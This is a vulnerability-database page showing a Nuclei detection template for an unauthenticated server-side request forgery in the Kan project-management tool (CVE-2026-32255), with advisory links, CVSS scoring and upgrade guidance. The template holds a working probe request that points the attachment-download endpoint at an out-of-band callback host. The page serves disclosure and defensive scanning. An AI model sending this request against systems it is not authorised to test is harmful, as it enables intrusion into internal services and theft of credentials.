Kan <= 0.5.4 - Server-Side Request Forgery
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2026-32255 | 18 Mar 202623:11 | – | attackerkb | |
| CVE-2026-32255 | 19 Mar 202600:31 | – | circl | |
| kan 代码问题漏洞 | 19 Mar 202600:00 | – | cnnvd | |
| CVE-2026-32255 | 18 Mar 202623:11 | – | cve | |
| CVE-2026-32255 Kan is Vulnerable to Unauthenticated SSRF via Attachment Download Endpoint | 18 Mar 202623:11 | – | cvelist | |
| EUVD-2026-12997 | 18 Mar 202623:11 | – | euvd | |
| CVE-2026-32255 | 19 Mar 202600:16 | – | nvd | |
| PT-2026-26167 | 18 Mar 202600:00 | – | ptsecurity | |
| CVE-2026-32255 | 26 Mar 202615:02 | – | redhatcve | |
| CVE-2026-32255 Kan is Vulnerable to Unauthenticated SSRF via Attachment Download Endpoint | 18 Mar 202623:11 | – | vulnrichment |
id: CVE-2026-32255
info:
name: Kan <= 0.5.4 - Server-Side Request Forgery
author: prithvee07
severity: high
description: |
Kan, an open-source project management tool (Trello alternative), versions 0.5.4 and below are vulnerable to an unauthenticated Server-Side Request Forgery in the /api/download/attatchment endpoint. The endpoint passes the attacker-controlled `url` query parameter straight to a server-side fetch() without validating the destination host, allowing an unauthenticated attacker to make the server issue arbitrary outbound HTTP requests and read back the full response body.
impact: |
Unauthenticated attackers can force the server to issue requests to internal-only services, such as cloud metadata endpoints or internal APIs, and read the complete response body, potentially exposing credentials, configuration data, and other sensitive internal information.
remediation: |
Upgrade Kan to version 0.5.5 or later, which validates the requested host against the configured S3_ENDPOINT before making the upstream request.
reference:
- https://github.com/kanbn/kan/security/advisories/GHSA-qrx8-9hc6-jvqg
- https://github.com/kanbn/kan/commit/53397d8e81dc1494d94132848c1f0416f1152bd7
- https://github.com/kanbn/kan/releases/tag/v0.5.5
- https://github.com/kOaDT/poc-cve-2026-32255
- https://nvd.nist.gov/vuln/detail/CVE-2026-32255
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2026-32255
epss-score: 0.09049
epss-percentile: 0.9486
cwe-id: CWE-918
metadata:
verified: true
max-request: 1
vendor: kanbn
product: kan
shodan-query: http.title:"Kan"
fofa-query: title="Kan" && body="_next"
tags: cve,cve2026,kan,ssrf,unauth,oast
http:
- raw:
- |
GET /api/download/attatchment?url=http://{{interactsh-url}}/{{randstr}}&filename={{randstr}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(header, "filename=\"{{randstr}}\"")'
condition: and
# digest: 4a0a00473045022047d43074b9df937cb3725936a933efb69ce4ebf58998fa1291857e018384df1d022100e73a8aba4e189fd7e94284b58ba5b497ec4aa8e6b0b5d702218c22e0929aa4eb:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Aug 2026 06:51Current
5.5Medium risk
Vulners AI Score5.5
CVSS 3.18.6
EPSS0.09049
SSVC